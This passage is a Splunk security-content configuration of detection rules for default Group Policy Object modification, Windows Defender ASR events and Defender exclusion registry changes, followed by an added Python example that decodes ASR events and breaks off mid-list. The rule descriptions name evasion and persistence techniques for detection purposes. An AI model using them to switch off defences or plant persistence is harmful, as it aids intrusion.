["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A default group policy object was modified on $Computer$ by $SubjectUserSid$ action.risk.param._risk = [{"risk_object_field": "SubjectUserSid", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = 
ESCU - Windows Default Group Policy Object Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Event ID 5136 to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. 
action.notable.param.rule_title = Windows Default Group Policy Object Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 ObjectClass=groupPolicyContainer AttributeLDAPDisplayName=versionNumber (ObjectDN="CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM,DC=*" OR ObjectDN="CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=POLICIES,CN=SYSTEM,DC=*") | stats min(_time) as firstTime max(_time) as lastTime by ObjectDN SubjectUserSid AttributeValue Computer DSName | rename AttributeValue as versionNumber | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_default_group_policy_object_modified_filter` [ESCU - Windows Default Group Policy Object Modified with GPME - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages the Endpoint datamodel to identify the potential edition of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the edition of the default GPOs. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic leverages the Endpoint datamodel to identify the potential edition of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the edition of the default GPOs. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = The default Group Policy Objects within an AD network may be legitimately updated for administrative operations, filter as needed. 
action.escu.creation_date = 2023-04-24 action.escu.modification_date = 2023-04-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Default Group Policy Object Modified with GPME - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A default group policy object was opened with Group Policy Manage Editor on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Default Group Policy Object Modified with GPME - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages the Endpoint datamodel to identify the potential edition of a default Group Policy Object. 
A fresh installation of an Active Directory network will typically contain two default group policy objects `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies to all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the edition of the default GPOs. action.notable.param.rule_title = Windows Default Group Policy Object Modified with GPME action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mmc.exe (Processes.process =*gpme.msc*) AND (Processes.process = "*31B2F340-016D-11D2-945F-00C04FB984F9*" OR Processes.process = "*6AC1786C-016F-11D2-945F-00C04fB984F9*" ) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_default_group_policy_object_modified_with_gpme_filter` [ESCU - Windows Defender ASR Audit Events - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection searches for Windows Defender ASR audit events. 
ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR audit events that are generated when a process or application attempts to perform an action that would be blocked by an ASR rule, but is allowed to proceed for auditing purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection searches for Windows Defender ASR audit events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR audit events that are generated when a process or application attempts to perform an action that would be blocked by an ASR rule, but is allowed to proceed for auditing purposes. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, setup a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. Note that Audit and block Event IDs have different fields, therefore the analytic will need to be modified for each type of event. action.escu.known_false_positives = False positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. 
For example, Event ID 1122 is generated when a process attempts to load a DLL that is blocked by an ASR rule. This can be triggered by legitimate applications that attempt to load DLLs that are not blocked by ASR rules. This is audit only. action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Audit Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] action.risk = 1 action.risk.param._risk_message = ASR audit event, $ASR_Rule$, was triggered on $dest$. action.risk.param._risk = [{"risk_object_field": "ASR_Rule", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Audit Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (1122, 1125, 1126, 1132, 1134) | lookup asr_rules ID OUTPUT ASR_Rule | fillnull value=NULL | stats count min(_time) as firstTime max(_time) as lastTime by host, Process_Name, Target_Commandline, Path, ID, EventCode, ASR_Rule | 
`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_audit_events_filter` [ESCU - Windows Defender ASR Block Events - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection searches for Windows Defender ASR block events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR block events that are generated when a process or application attempts to perform an action that is blocked by an ASR rule. Typically, these rules are moved to block mode only after the ASR rules themselves have been audited and tuned. Set to TTP once tuned. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection searches for Windows Defender ASR block events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR block events that are generated when a process or application attempts to perform an action that is blocked by an ASR rule. Typically, these rules are moved to block mode only after the ASR rules themselves have been audited and tuned. Set to TTP once tuned. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, set up a new input for the Windows Defender Operational logs. 
In addition, it does require a lookup that maps the ID to ASR Rule name. Note that audit and block Event IDs carry different fields, so the analytic must be adjusted for each type of event. action.escu.known_false_positives = False positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. For example, Event ID 1121 is generated when an ASR rule blocks an action; legitimate applications that perform the same action generate it as well. This is block only. action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Block Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] action.risk = 1 action.risk.param._risk_message = ASR block event, $ASR_Rule$, was triggered on $dest$. 
action.risk.param._risk = [{"risk_object_field": "ASR_Rule", "risk_object_type": "other", "risk_score": 45}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Block Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1059", "T1566.001", "T1566.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (1121, 1126, 1129, 1131, 1133) | lookup asr_rules ID OUTPUT ASR_Rule | fillnull value=NULL | stats count min(_time) as firstTime max(_time) as lastTime by host, Path, Parent_Commandline, Process_Name, ID, EventCode, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_block_events_filter` [ESCU - Windows Defender ASR Registry Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection searches for Windows Defender ASR registry modification events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. 
This detection searches for Event ID 5007 configuration-change events in which the registry value holding an ASR rule's state (Disabled, Block, Audit or Warn) is modified. Typically, ASR rules are moved to block mode only after they have been audited and tuned. Set to TTP once tuned. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection searches for Windows Defender ASR registry modification events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for Event ID 5007 configuration-change events in which the registry value holding an ASR rule's state (Disabled, Block, Audit or Warn) is modified. Typically, ASR rules are moved to block mode only after they have been audited and tuned. Set to TTP once tuned. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, set up a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. action.escu.known_false_positives = False positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. For example, Event ID 5007 is generated whenever the Defender configuration changes, including the registry values that hold ASR rule state, so legitimate configuration management (Group Policy or PowerShell) produces the same event. 
action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Registry Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Registry Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (5007) | rex field=New_Value "0x(?<New_Registry_Value>\\d+)$" | rex field=Old_Value "0x(?<Old_Registry_Value>\\d+)$" | rex field=New_Value "Rules\\\\(?<ASR_ID>[A-Fa-f0-9\\-]+)\\s*=" | lookup asr_rules ID AS ASR_ID OUTPUT ASR_Rule | eval New_Registry_Value=case(New_Registry_Value=="0", "Disabled", New_Registry_Value=="1", "Block", New_Registry_Value=="2", "Audit", New_Registry_Value=="6", "Warn") | eval Old_Registry_Value=case(Old_Registry_Value=="0", "Disabled", Old_Registry_Value=="1", "Block", Old_Registry_Value=="2", "Audit", Old_Registry_Value=="6", "Warn") | stats count min(_time) as firstTime max(_time) as lastTime by host, New_Value, Old_Value, Old_Registry_Value, New_Registry_Value, ASR_Rule | `security_content_ctime(firstTime)`| rename host as dest | `security_content_ctime(lastTime)` | `windows_defender_asr_registry_modification_filter` [ESCU - Windows Defender ASR Rule Disabled - 
Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for Event ID 5007 configuration-change events in which an ASR rule's registry value is set to 0 (Disabled). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for Event ID 5007 configuration-change events in which an ASR rule's registry value is set to 0 (Disabled). action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, set up a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. action.escu.known_false_positives = False positives may occur if applications in the environment routinely disable ASR rules. Monitor changes to ASR rules to determine whether the event is expected. 
action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Rule Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] action.risk = 1 action.risk.param._risk_message = ASR rule disabled event, $ASR_Rule$, was triggered on $dest$. action.risk.param._risk = [{"risk_object_field": "ASR_Rule", "risk_object_type": "other", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Rule Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for Event ID 5007 configuration-change events in which an ASR rule's registry value is set to 0 (Disabled). 
action.notable.param.rule_title = Windows Defender ASR Rule Disabled action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (5007) | rex field=New_Value "0x(?<New_Registry_Value>\\d+)$" | rex field=Old_Value "0x(?<Old_Registry_Value>\\d+)$" | rex field=New_Value "Rules\\\\(?<ASR_ID>[A-Fa-f0-9\\-]+)\\s*=" | lookup asr_rules ID AS ASR_ID OUTPUT ASR_Rule | eval New_Registry_Value=case(New_Registry_Value=="0", "Disabled", New_Registry_Value=="1", "Block", New_Registry_Value=="2", "Audit", New_Registry_Value=="6", "Warn") | eval Old_Registry_Value=case(Old_Registry_Value=="0", "Disabled", Old_Registry_Value=="1", "Block", Old_Registry_Value=="2", "Audit", Old_Registry_Value=="6", "Warn") | search New_Registry_Value="Disabled" | stats count min(_time) as firstTime max(_time) as lastTime by host, New_Value, Old_Value, Old_Registry_Value, New_Registry_Value, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_rule_disabled_filter` [ESCU - Windows Defender ASR Rules Stacking - Rule] action.escu = 0 action.escu.enabled = 1 description = This hunting analytic targets a range of security events from Microsoft Defender, focusing on the Exploit Guard and Attack Surface Reduction (ASR) features. It monitors specific Event IDs - Event IDs 1121 and 1126 indicate active blocking of unauthorized operations or dangerous network connections, whereas Event IDs 1122 and 1125 represent audit logs for similar activities. Event ID 1129 shows user overrides on blocked operations. For ASR-related activities, Event IDs 1131 and 1133 signal blocked operations, while 1132 and 1134 are audit logs. Event ID 5007 alerts on configuration changes, possibly indicating security breaches. 
\ Additionally, the analytic utilizes a lookup to correlate ASR rule GUIDs with their descriptive names, enhancing understanding of the context behind these security alerts. This includes rules for blocking vulnerable drivers, restricting actions of Adobe Reader and Office applications, and protecting against various malware and unauthorized system changes. This comprehensive approach aids in assessing policy enforcement and potential security risks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1566.001", "T1566.002", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting analytic targets a range of security events from Microsoft Defender, focusing on the Exploit Guard and Attack Surface Reduction (ASR) features. It monitors specific Event IDs - Event IDs 1121 and 1126 indicate active blocking of unauthorized operations or dangerous network connections, whereas Event IDs 1122 and 1125 represent audit logs for similar activities. Event ID 1129 shows user overrides on blocked operations. For ASR-related activities, Event IDs 1131 and 1133 signal blocked operations, while 1132 and 1134 are audit logs. Event ID 5007 alerts on configuration changes, possibly indicating security breaches. \ Additionally, the analytic utilizes a lookup to correlate ASR rule GUIDs with their descriptive names, enhancing understanding of the context behind these security alerts. This includes rules for blocking vulnerable drivers, restricting actions of Adobe Reader and Office applications, and protecting against various malware and unauthorized system changes. This comprehensive approach aids in assessing policy enforcement and potential security risks. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, set up a new input for the Windows Defender Operational logs. 
In addition, it does require a lookup that maps the ID to ASR Rule name. Note that Audit and block Event IDs have different fields, therefore the analytic will need to be modified for each type of event. The analytic can be modified to look for specific ASR rules, or to look for specific Event IDs. EventID 5007 is a change in the registry, and may be a false positive. This can be removed from the search if desired. action.escu.known_false_positives = False positives are not expected with this analytic, since it is a hunting analytic. It is meant to show the use of ASR rules and how they can be used to detect malicious activity. action.escu.creation_date = 2023-11-20 action.escu.modification_date = 2023-11-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Rules Stacking - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Rules Stacking - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1566.001", "T1566.002", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (1121, 1122, 1125, 1126, 1129, 1131, 1132, 1133, 1134, 5007) | lookup asr_rules ID OUTPUT ASR_Rule | fillnull value=NULL | stats count min(_time) as firstTime max(_time) as lastTime by host 
Parent_Commandline, Process_Name, Path, ID, EventCode, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_rules_stacking_filter` [ESCU - Windows Defender Exclusion Registry Entry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects a suspicious process modifying a registry key related to the Windows Defender exclusion feature. This registry location is abused by adversaries, malware authors and red teams to bypass Windows Defender Antivirus by excluding folder paths, file paths, processes or extensions from real-time or scheduled scans so that malicious code can execute unscanned. This is a good indicator of defense evasion and a cue to look further at events that follow this behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects a suspicious process modifying a registry key related to the Windows Defender exclusion feature. This registry location is abused by adversaries, malware authors and red teams to bypass Windows Defender Antivirus by excluding folder paths, file paths, processes or extensions from real-time or scheduled scans so that malicious code can execute unscanned. This is a good indicator of defense evasion and a cue to look further at events that follow this behavior. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Administrators or users may legitimately configure Windows Defender exclusions. 
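The ASR analytics above (audit events, block events, registry modification, rule disabled and rules stacking) share one decoding pipeline: classify the Defender Operational EventCode as block, audit, user override or 5007 configuration change; resolve the rule GUID through the asr_rules lookup; and, for 5007, pull the GUID and the trailing 0x value out of Old_Value/New_Value and map 0/1/2/6 to Disabled/Block/Audit/Warn. The Python below is an added example, not code from Splunk's security_content, that runs that pipeline over constructed sample events. The ASR_RULES table stands in for the asr_rules lookup, the field names (host, EventCode, ID, Process_Name, Old_Value, New_Value) are assumed to match what the searches expect, and the registry path in the sample values is constructed to the shape the searches' rex stages parse.

```python
"""Added example (not Splunk's code): the ASR decoding and roll-up logic of the
ESCU analytics above, run over a few constructed Defender Operational events."""
import re
from collections import Counter

# Stand-in for the `asr_rules` lookup (ID -> ASR_Rule). The three GUIDs are
# Microsoft's published rule IDs; treat the table as illustrative only.
ASR_RULES = {
    "56a863a9-875e-4185-98a7-b882c64b5ce5": "Block abuse of exploited vulnerable signed drivers",
    "d4f940ab-401b-4efc-aadc-ad5f3c50688a": "Block all Office applications from creating child processes",
    "be9ba2d9-53ea-4cdc-84e5-9b1eeee46550": "Block executable content from email client and webmail",
}

# EventCode -> category, as laid out in the Rules Stacking description.
EVENT_CLASS = {
    1121: "block", 1126: "block", 1131: "block", 1133: "block",
    1122: "audit", 1125: "audit", 1132: "audit", 1134: "audit",
    1129: "user_override",
    5007: "config_change",
}

# Registry DWORD -> ASR mode, the same table as the eval/case() stages.
ASR_MODE = {0: "Disabled", 1: "Block", 2: "Audit", 6: "Warn"}

# Equivalents of the two rex stages. The value is parsed as hex (the 0x prefix
# denotes hex); for the four valid modes this agrees with the decimal-only rex.
VALUE_RE = re.compile(r"0x([0-9A-Fa-f]+)$")
GUID_RE = re.compile(r"Rules\\([A-Fa-f0-9-]+)\s*=")


def decode_asr_value(value):
    """Parse a 5007 Old_Value/New_Value string into (rule_guid, mode_name).
    Either element is None when its part of the string does not match."""
    guid_m = GUID_RE.search(value)
    val_m = VALUE_RE.search(value)
    guid = guid_m.group(1).lower() if guid_m else None
    mode = ASR_MODE.get(int(val_m.group(1), 16)) if val_m else None
    return guid, mode


def classify(event):
    """Tag one event with its category and ASR rule name; for 5007 also with
    the old and new mode. Returns None for EventCodes outside the ASR set."""
    category = EVENT_CLASS.get(event["EventCode"])
    if category is None:
        return None
    out = {"dest": event["host"], "EventCode": event["EventCode"], "category": category}
    if category == "config_change":
        guid, new_mode = decode_asr_value(event["New_Value"])
        _, old_mode = decode_asr_value(event["Old_Value"])
        out.update(ASR_ID=guid, Old_Registry_Value=old_mode, New_Registry_Value=new_mode)
    else:
        # Block/audit/override events carry the rule GUID in the ID field.
        guid = event.get("ID", "").lower() or None
        out.update(ASR_ID=guid, Process_Name=event.get("Process_Name"))
    out["ASR_Rule"] = ASR_RULES.get(guid, "NULL")  # mirrors `fillnull value=NULL`
    return out


def rule_disabled(events):
    """The 'ASR Rule Disabled' condition: 5007 events whose new mode is Disabled."""
    return [c for c in map(classify, events)
            if c and c["category"] == "config_change"
            and c["New_Registry_Value"] == "Disabled"]


def stack(events):
    """The 'Rules Stacking' roll-up: event counts by (dest, category, ASR_Rule)."""
    counts = Counter()
    for c in map(classify, events):
        if c:
            counts[(c["dest"], c["category"], c["ASR_Rule"])] += 1
    return counts


# Constructed sample events (not real telemetry), shaped like the fields the
# searches use: host, EventCode, ID, Process_Name, Old_Value, New_Value.
ASR_KEY = ("HKLM\\SOFTWARE\\Microsoft\\Windows Defender"
           "\\Windows Defender Exploit Guard\\ASR\\Rules\\")
SAMPLE_EVENTS = [
    {"host": "ws01", "EventCode": 1121, "ID": "D4F940AB-401B-4EFC-AADC-AD5F3C50688A",
     "Process_Name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"},
    {"host": "ws01", "EventCode": 1122, "ID": "56a863a9-875e-4185-98a7-b882c64b5ce5",
     "Process_Name": "C:\\Users\\alice\\Downloads\\installer.exe"},
    {"host": "ws01", "EventCode": 1129, "ID": "be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",
     "Process_Name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"},
    {"host": "ws02", "EventCode": 5007,
     "Old_Value": ASR_KEY + "d4f940ab-401b-4efc-aadc-ad5f3c50688a = 0x1",
     "New_Value": ASR_KEY + "d4f940ab-401b-4efc-aadc-ad5f3c50688a = 0x0"},
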